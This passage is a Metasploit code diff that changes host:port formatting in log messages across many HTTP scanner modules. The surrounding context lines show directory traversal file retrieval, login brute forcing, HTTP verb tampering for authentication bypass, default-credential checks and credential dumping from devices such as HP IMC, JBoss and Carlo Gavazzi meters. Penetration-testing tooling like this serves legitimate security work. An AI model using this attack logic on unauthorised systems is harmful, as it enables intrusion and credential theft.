-      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
 
       # Extract firmware version
       begin
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary
           }
         )
       rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
         return :abort
       end
 
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Auxiliary
           fw_ver = res.body.match(/Ver. (.*)[$<]/)[1]
 
           if !fw_ver.nil?
-            print_good("#{rhost}:#{rport} - Firmware version #{fw_ver}...")
+            print_good("#{Rex::Socket.to_authority(rhost, rport)} - Firmware version #{fw_ver}...")
 
             report_cred(
               ip: rhost,
@@ -207,7 +207,7 @@ class MetasploitModule < Msf::Auxiliary
           }
         )
       rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
         return :abort
       end
 
@@ -222,15 +222,15 @@ class MetasploitModule < Msf::Auxiliary
           smtp_pass = dirty_smtp_pass.match(/[$"](.*)[$"]/)
 
           if (!smtp_server.nil?) && (!smtp_user.nil?) && (!smtp_pass.nil?)
-            print_good("#{rhost}:#{rport} - SMTP server: #{smtp_server}, SMTP username: #{smtp_user}, SMTP password: #{smtp_pass}")
+            print_good("#{Rex::Socket.to_authority(rhost, rport)} - SMTP server: #{smtp_server}, SMTP username: #{smtp_user}, SMTP password: #{smtp_pass}")
           end
         end
       else
-        vprint_error("#{rhost}:#{rport} - SMTP config could not be retrieved. Check if the user has administrative privileges")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - SMTP config could not be retrieved. Check if the user has administrative privileges")
       end
       return :next_user
     else
-      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+      print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
     end
   end
 
@@ -247,20 +247,20 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return :abort
     end
 
     if res && res.code == 200
-      print_status("#{rhost}:#{rport} - dumping EWplant.db")
-      print_good("#{rhost}:#{rport} - EWplant.db retrieved successfully!")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - dumping EWplant.db")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - EWplant.db retrieved successfully!")
       loot_name = 'EWplant.db'
       loot_type = 'SQLite_db/text'
       loot_desc = 'Carlo Gavazzi EM - EWplant.db'
       path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body, loot_desc)
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve EWplant.db. Set a higher HTTPCLIENTTIMEOUT and try again. Else, check if target is running vulnerable version.?")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve EWplant.db. Set a higher HTTPCLIENTTIMEOUT and try again. Else, check if target is running vulnerable version.?")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
+++ b/modules/auxiliary/scanner/http/grafana_plugin_traversal.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
         res.body,
         File.basename(datastore['FILEPATH'])
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
       break
     end
   end

--- a/modules/auxiliary/scanner/http/graphql_introspection_scanner.rb
+++ b/modules/auxiliary/scanner/http/graphql_introspection_scanner.rb
@@ -312,15 +312,15 @@ class MetasploitModule < Msf::Auxiliary
     res = send_graphql_request(query)
 
     if res.nil?
-      print_error("#{rhost}:#{rport} - The server did not send a response.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - The server did not send a response.")
       return
     end
 
     if res.code == 200
-      print_good("#{rhost}:#{rport} - Server responded with introspected data. Reporting a vulnerability, and storing it as loot.")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Server responded with introspected data. Reporting a vulnerability, and storing it as loot.")
       # validate the JSON response has the expected structure of an introspection response, to avoid false positives.
       unless valid_graphql_response?(res.get_json_document)
-        print_error("#{rhost}:#{rport} - Server responded with a 200 status code, but the response did not have the expected structure of an introspection response")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server responded with a 200 status code, but the response did not have the expected structure of an introspection response")
         return
       end
       graphql_service = report_graphql_service
@@ -330,14 +330,14 @@ class MetasploitModule < Msf::Auxiliary
     else
       json = res.get_json_document
       if json.nil?
-        print_error("#{rhost}:#{rport} - Server replied with an unexpected status code: '#{res.code}', and the response was not a valid JSON document.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server replied with an unexpected status code: '#{res.code}', and the response was not a valid JSON document.")
         return
       end
 
       if json.key?('errors') || json.key?('error')
-        print_error("#{rhost}:#{rport} - Server encountered the following error(s) (code: '#{res.code}'):\n#{process_errors(json['errors'] || Array.wrap(json['error']))}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server encountered the following error(s) (code: '#{res.code}'):\n#{process_errors(json['errors'] || Array.wrap(json['error']))}")
       else
-        print_error("#{rhost}:#{rport} - Server replied with an unexpected status code: '#{res.code}'")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Server replied with an unexpected status code: '#{res.code}'")
       end
     end
   end

--- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
+++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if not is_groupwise?
-      vprint_error("#{rhost}:#{rport} - This isn't a GroupWise Agent HTTP Interface")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This isn't a GroupWise Agent HTTP Interface")
       return
     end
 
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
 
     travs = normalize_uri("/help/", travs, datastore['FILEPATH'])
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => travs,
       'method' => 'GET',
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/host_header_injection.rb
+++ b/modules/auxiliary/scanner/http/host_header_injection.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
     # the original host requested by the client in the Host HTTP request header.
 
     begin
-      vprint_status("Sending request #{rhost}:#{rport}#{web_path} (#{vhost})(#{http_method}) with 'Host' value '#{target_host}'")
+      vprint_status("Sending request #{Rex::Socket.to_authority(rhost, rport)}#{web_path} (#{vhost})(#{http_method}) with 'Host' value '#{target_host}'")
 
       res = send_request_raw({
         'uri' => web_path,
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       unless res
-        vprint_error("#{rhost}:#{rport}#{web_path} (#{vhost}) did not reply to our request")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)}#{web_path} (#{vhost}) did not reply to our request")
         return
       end
 
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       if evidence
-        print_good("#{rhost}:#{rport}#{web_path} (#{vhost})(#{res.code})(#{http_method})(evidence into #{evidence}) is vulnerable to HTTP Host header injection")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)}#{web_path} (#{vhost})(#{res.code})(#{http_method})(evidence into #{evidence}) is vulnerable to HTTP Host header injection")
 
         report_vuln(
           host: rhost,
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
         })
 
       else
-        vprint_error("#{rhost}:#{rport}#{web_path} (#{vhost}) returned #{res.code} #{res.message}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)}#{web_path} (#{vhost}) returned #{res.code} #{res.message}")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::EPIPE

--- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if not is_imc?
-      vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This isn't a HP Intelligent Management Center")
       return
     end
 
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
     travs << "../" * datastore['DEPTH']
     travs << datastore['FILEPATH']
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s, "bimsDownload"),
       'method' => 'GET',
@@ -98,9 +98,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if not is_imc?
-      vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This isn't a HP Intelligent Management Center")
       return
     end
 
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
     travs << "../" * datastore['DEPTH']
     travs << datastore['FILEPATH']
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"),
       'method' => 'GET',
@@ -96,9 +96,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if not is_imc?
-      vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This isn't a HP Intelligent Management Center")
       return
     end
 
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
     travs << "../" * datastore['DEPTH']
     travs << datastore['FILEPATH']
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s, "tmp", "ict", "download"),
       'method' => 'GET',
@@ -96,9 +96,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if not is_imc?
-      vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - This isn't a HP Intelligent Management Center")
       return
     end
 
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
     travs << "../" * datastore['DEPTH']
     travs << datastore['FILEPATH']
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s, "reportImg"),
       'method' => 'GET',
@@ -96,9 +96,9 @@ class MetasploitModule < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -328,7 +328,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Did we get it?
     if res and res.body =~ /#{unique_str}/
-      print_good("WRITE is possible on #{rhost}:#{rport}")
+      print_good("WRITE is possible on #{Rex::Socket.to_authority(rhost, rport)}")
     else
       print_error("WRITE seems unlikely")
     end

--- a/modules/auxiliary/scanner/http/infovista_enum.rb
+++ b/modules/auxiliary/scanner/http/infovista_enum.rb
@@ -41,14 +41,14 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     unless is_app_infovista?
-      print_error("#{rhost}:#{rport} - Application does not appear to be InfoVista VistaPortal. Module will not continue.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be InfoVista VistaPortal. Module will not continue.")
       return
     end
 
     status = try_default_credential
     return if status == :abort
 
-    print_status("#{rhost}:#{rport} - Brute-forcing...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Brute-forcing...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
     if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/)
       version_key = /PORTAL_VERSION = (.+)./
       version = res.body.scan(version_key).flatten[0].gsub('"', '')
-      print_good("#{rhost}:#{rport} - Application version is #{version}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Application version is #{version}")
       return true
     else
       return false
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
   # Brute-force the login page
   #
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_cgi(
         {
@@ -130,14 +130,14 @@ class MetasploitModule < Msf::Auxiliary
       )
 
       if (not res or res.code != 200 or res.body !~ /location.href.*AdminFrame\.jsp/)
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
       else
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
         report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
         return :next_user
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end

--- a/modules/auxiliary/scanner/http/jboss_status.rb
+++ b/modules/auxiliary/scanner/http/jboss_status.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
 
     @requests = []
 
-    vprint_status("#{rhost}:#{rport} - Collecting data through #{jpath}...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Collecting data through #{jpath}...")
 
     res = send_request_raw({
       'uri' => jpath,
@@ -65,13 +65,13 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     elsif res and res.code == 401
-      vprint_error("#{rhost}:#{rport} - Authentication is required")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Authentication is required")
       return
     elsif res and res.code == 403
-      vprint_error("#{rhost}:#{rport} - Forbidden")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Forbidden")
       return
     else
-      vprint_error("#{rhost}:#{rport} - Unknown error")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unknown error")
       return
     end
 
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def show_results(target_host)
-    print_good("#{rhost}:#{rport} JBoss application server found")
+    print_good("#{Rex::Socket.to_authority(rhost, rport)} JBoss application server found")
 
     req_table = Rex::Text::Table.new(
       'Header' => 'JBoss application server requests',

--- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb
+++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb
@@ -55,10 +55,10 @@ class MetasploitModule < Msf::Auxiliary
     if res
 
       info = http_fingerprint(:response => res)
-      print_status("#{rhost}:#{rport} Fingerprint: #{info}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Fingerprint: #{info}")
 
       if res.body && />(JBoss[^<]+)/.match(res.body)
-        print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} JBoss error message: #{$1}")
       end
 
       apps = [
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
         '/invoker/readonly'
       ]
 
-      print_status("#{rhost}:#{rport} Checking http...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Checking http...")
       apps.each do |app|
         check_app(app)
       end
@@ -85,10 +85,10 @@ class MetasploitModule < Msf::Auxiliary
         1099 => 'Naming Service',
         4444 => 'RMI invoker'
       }
-      print_status("#{rhost}:#{rport} Checking services...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Checking services...")
       ports.each do |port, service|
         status = test_connection(ip, port) == :up ? "open" : "closed"
-        print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} #{service} tcp/#{port}: #{status}")
       end
     end
   end
@@ -101,32 +101,32 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     unless res
-      print_status("#{rhost}:#{rport} #{app} not found")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} #{app} not found")
       return
     end
 
     case
     when res.code == 200
-      print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} #{app} does not require authentication (200)")
     when res.code == 403
-      print_status("#{rhost}:#{rport} #{app} restricted (403)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} #{app} restricted (403)")
     when res.code == 401
-      print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")
       bypass_auth(app)
       basic_auth_default_creds(app)
     when res.code == 404
-      print_status("#{rhost}:#{rport} #{app} not found (404)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} #{app} not found (404)")
     when res.code == 301, res.code == 302
-      print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
     when res.code == 500 && app == "/invoker/readonly"
-      print_good("#{rhost}:#{rport} #{app} responded (#{res.code})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} #{app} responded (#{res.code})")
     else
-      print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Don't know how to handle response code #{res.code}")
     end
   end
 
   def jboss_as_default_creds
-    print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Checking for JBoss AS default creds")
 
     session = jboss_as_session_setup(rhost, rport)
     return false if session.nil?
@@ -149,10 +149,10 @@ class MetasploitModule < Msf::Auxiliary
 
     # Valid creds if 302 redirected to summary.seam and not error.seam
     if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m
-      print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Authenticated using #{username}:#{password} at /admin-console/")
       add_creds(username, password)
     else
-      print_status("#{rhost}:#{rport} Could not guess admin credentials")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Could not guess admin credentials")
     end
   end
 
@@ -194,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary
       viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]
       jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]
     rescue ::NoMethodError
-      print_status("#{rhost}:#{rport} Could not guess admin credentials")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Could not guess admin credentials")
       return nil
     end
 
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def bypass_auth(app)
-    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Check for verb tampering (#{datastore['VERB']})")
 
     res = send_request_raw({
       'uri' => app,
@@ -211,9 +211,9 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if res && res.code == 200
-      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering at #{app}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Got authentication bypass via HTTP verb tampering at #{app}")
     else
-      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Could not get authentication bypass via HTTP verb tampering")
     end
   end
 
@@ -226,10 +226,10 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if res && res.code == 200
-      print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Authenticated using admin:admin at #{app}")
       add_creds("admin", "admin")
     else
-      print_status("#{rhost}:#{rport} Could not guess admin credentials")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Could not guess admin credentials")
     end
   end
 

--- a/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
+++ b/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
 
       if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/
         path = res.headers['Location']
-        vprint_status("#{rhost}:#{rport} - Following redirect: #{path}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Following redirect: #{path}")
         begin
           res = send_request_cgi(
             'uri' => path,
@@ -96,11 +96,11 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    vprint_status("#{rhost}:#{rport} - Searching Joomla authentication URI...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Searching Joomla authentication URI...")
     @uri = find_auth_uri
 
     unless @uri
-      vprint_error("#{rhost}:#{rport} - No URI found that asks for authentication")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - No URI found that asks for authentication")
       return
     end
 

--- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb
+++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # without res.body.length we get lots of false positives
     if (res and res.code == 200 and res.body.length > 0)
-      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Request may have succeeded on file #{file}")
       report_web_vuln({
         :host => rhost,
         :port => rport,
@@ -82,9 +82,9 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       loot = store_loot("linksys.traversal.data", "text/plain", rhost, res.body, file)
-      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
+      vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - File #{file} downloaded to: #{loot}")
     elsif (res and res.code)
-      vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
     end
   end
 
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
 
-    vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}")
 
     # test login
     begin
@@ -107,13 +107,13 @@ class MetasploitModule < Msf::Auxiliary
       return if (res.code == 404)
 
       if [200, 301, 302].include?(res.code)
-        vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+        vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}")
       else
-        vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - No successful login possible with #{user}/#{pass}")
         return
       end
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server")
       return
     end
 

--- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
@@ -62,21 +62,21 @@ class MetasploitModule < Msf::Auxiliary
         )
 
         if res.nil?
-          print_error("#{rhost}:#{rport} Connection timed out")
+          print_error("#{Rex::Socket.to_authority(rhost, rport)} Connection timed out")
           return
         end
 
-        print_status("#{rhost}:#{rport} Trying URL " + payload)
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} Trying URL " + payload)
 
         if (res and res.code == 200 and res.body)
           if res.body.match(/\<html\>(.*)\<\/html\>/im)
             html = $1
 
             if res.body =~ /unknowntopic/
-              print_error("#{rhost}:#{rport} Could not retrieve the file")
+              print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not retrieve the file")
             else
               file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
-              print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
+              print_good("#{Rex::Socket.to_authority(rhost, rport)} Successfully retrieved #{file} and storing as loot...")
 
               # Transform HTML entities back to the original characters
               file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')
@@ -85,17 +85,17 @@ class MetasploitModule < Msf::Auxiliary
               return
             end
           else
-            print_error("#{rhost}:#{rport} No HTML was returned")
+            print_error("#{Rex::Socket.to_authority(rhost, rport)} No HTML was returned")
           end
         else
           # if res is nil, we hit this
-          print_error("#{rhost}:#{rport} Unrecognized #{res.code} response")
+          print_error("#{Rex::Socket.to_authority(rhost, rport)} Unrecognized #{res.code} response")
         end
         i += 1;
       end
     end
 
-    print_error("#{rhost}:#{rport} Not vulnerable or the DEPTH setting was too low")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} Not vulnerable or the DEPTH setting was too low")
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
   rescue ::Timeout::Error, ::Errno::EPIPE
   end

--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -59,15 +59,15 @@ class MetasploitModule < Msf::Auxiliary
         'method' => 'GET'
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
